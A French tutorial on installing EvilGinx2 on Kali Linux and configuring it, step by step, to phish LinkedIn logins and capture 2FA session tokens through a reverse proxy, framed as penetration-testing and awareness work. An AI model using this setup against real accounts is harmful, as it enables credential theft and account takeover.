EvilGinx2 sur Kali Linux
Utilisation de EvilGinx2 sur Kali Linux – Guide Complet
EvilGinx2 est un outil puissant utilisé pour réaliser des attaques de phishing et capturer des tokens d’authentification à deux facteurs (2FA). Utilisé par les professionnels de la cybersécurité, EvilGinx2 permet de configurer des pages de phishing et de proxy inverses pour capturer les identifiants de connexion et les tokens 2FA. Intégré à la distribution Kali Linux, EvilGinx2 est un outil essentiel pour tester la sécurité des systèmes et sensibiliser aux risques de phishing.
Installation de EvilGinx2 sur Kali Linux
EvilGinx2 peut être installé sur Kali Linux en utilisant les commandes suivantes :
sudo apt-get update
sudo apt-get install git make
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
Lancement de EvilGinx2
Pour démarrer EvilGinx2, utilisez simplement la commande suivante :
sudo ./bin/evilginx
Vous serez accueilli par l’interface interactive de EvilGinx2 où vous pourrez entrer des commandes pour configurer vos attaques de phishing.
Options et Commandes de EvilGinx2
EvilGinx2 offre une multitude d’options pour configurer vos attaques de phishing et capturer des tokens 2FA. Voici les principales commandes et leurs utilisations :
1. Configuration du Domaine
Pour configurer le domaine que vous allez utiliser pour le phishing, utilisez la commande suivante :
config domain yourdomain.com
Assurez-vous que le domaine pointe vers l’adresse IP de votre serveur EvilGinx2.
2. Configuration de l’Interface Réseau
Pour configurer l’interface réseau que EvilGinx2 utilisera, utilisez la commande suivante :
config ip your_ip_address
3. Chargement d’un Modèle (Phishlet)
EvilGinx2 utilise des « phishlets » pour définir les comportements de phishing pour différents services. Pour charger un phishlet, utilisez la commande suivante :
phishlets hostname
Par exemple :
phishlets hostname linkedin linkedin.yourdomain.com
4. Activer un Phishlet
Pour activer un phishlet, utilisez la commande suivante :
phishlets enable
Par exemple :
phishlets enable linkedin
5. Visualiser les Sessions
Pour visualiser les sessions actives et les identifiants capturés, utilisez la commande suivante :
sessions
Exemple Pratique
Voici un exemple pratique d’utilisation de EvilGinx2 pour configurer une attaque de phishing sur LinkedIn :
-
- Installez et démarrez EvilGinx2 :
sudo apt-get update && sudo apt-get install git make
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo ./bin/evilginx
-
- Configurez le domaine et l’interface réseau :
config domain yourdomain.com
config ip your_ip_address
-
- Chargez et configurez le phishlet LinkedIn :
phishlets hostname linkedin linkedin.yourdomain.com
phishlets enable linkedin
-
- Visualisez les sessions actives :
sessions
Exploration Approfondie de EvilGinx2
EvilGinx2 est un outil versatile avec de nombreuses options avancées pour des attaques de phishing personnalisées. Voici quelques fonctionnalités supplémentaires :
1. Création de Phishlets Personnalisés
Vous pouvez créer vos propres phishlets pour des services non inclus par défaut. Consultez la documentation officielle de EvilGinx2 pour apprendre à créer des phishlets personnalisés.
2. Configuration des Certificats SSL
Pour sécuriser vos pages de phishing, utilisez Let’s Encrypt pour obtenir des certificats SSL. EvilGinx2 gère automatiquement l’obtention et le renouvellement des certificats SSL pour vos domaines.
3. Enregistrement des Sessions
Pour enregistrer les sessions et les identifiants capturés, EvilGinx2 stocke les données localement dans des fichiers journaux. Vous pouvez configurer l’emplacement et le format des journaux selon vos besoins.
Cas d’Usage de EvilGinx2
EvilGinx2 est utilisé dans divers contextes pour améliorer la sécurité des systèmes et sensibiliser aux risques de phishing. Voici quelques cas d’usage spécifiques :
1. Évaluation de la Sensibilisation au Phishing
Les administrateurs réseau et les formateurs en cybersécurité utilisent EvilGinx2 pour évaluer la sensibilisation des utilisateurs aux attaques de phishing et pour organiser des campagnes de formation.
2. Tests de Pénétration
Les testeurs de pénétration utilisent EvilGinx2 pour simuler des attaques de phishing et tester la robustesse des défenses de sécurité des systèmes contre les attaques de type man-in-the-middle et la capture de tokens 2FA.
3. Recherche en Sécurité
Les chercheurs en sécurité utilisent EvilGinx2 pour étudier les techniques de phishing avancées et développer des stratégies de défense contre ces attaques.
Conclusion
EvilGinx2 est un outil indispensable pour les professionnels de la cybersécurité cherchant à analyser et améliorer la sécurité des systèmes via des techniques de phishing avancées. En suivant ce guide, vous devriez être capable de commencer à utiliser EvilGinx2 efficacement sur Kali Linux. Que vous soyez administrateur réseau, testeur de pénétration ou formateur, EvilGinx2 offre une gamme d’outils et de fonctionnalités pour découvrir et corriger les vulnérabilités des systèmes face aux attaques de phishing.
Pour plus d’informations et des tutoriels avancés, consultez la documentation officielle de EvilGinx2.
Ressources Supplémentaires
Voici quelques ressources supplémentaires pour approfondir vos connaissances et compétences avec EvilGinx2 :
- Dépôt GitHub de EvilGinx2 – Pour accéder au code source et contribuer au projet.
- Site officiel de Kali Linux – Pour des informations sur Kali Linux et d’autres outils de cybersécurité.
- Offensive Security – Pour des cours et certifications en cybersécurité.
- Cours de Sensibilisation au Phishing sur Coursera – Pour en savoir plus sur les pratiques et outils de phishing.
Glossaire
Voici un glossaire des termes couramment utilisés dans EvilGinx2 et la cybersécurité :
- Phishing: Technique frauduleuse visant à obtenir des informations sensibles telles que des identifiants de connexion en se faisant passer pour une entité de confiance.
- Token 2FA: Code d’authentification à deux facteurs utilisé pour renforcer la sécurité des connexions en demandant une deuxième forme de vérification en plus du mot de passe.
- Proxy inverse: Serveur qui intercepte les requêtes des clients et les transmet aux serveurs en arrière-plan, souvent utilisé pour les attaques de phishing.
- SSL (Secure Sockets Layer): Protocole de sécurité qui crée un lien crypté entre un serveur web et un navigateur.
- Phishlet: Script utilisé par EvilGinx2 pour définir le comportement de phishing pour un service spécifique.
editor's pick
latest video
news via inbox
Nulla turp dis cursus. Integer liberos euismod pretium faucibua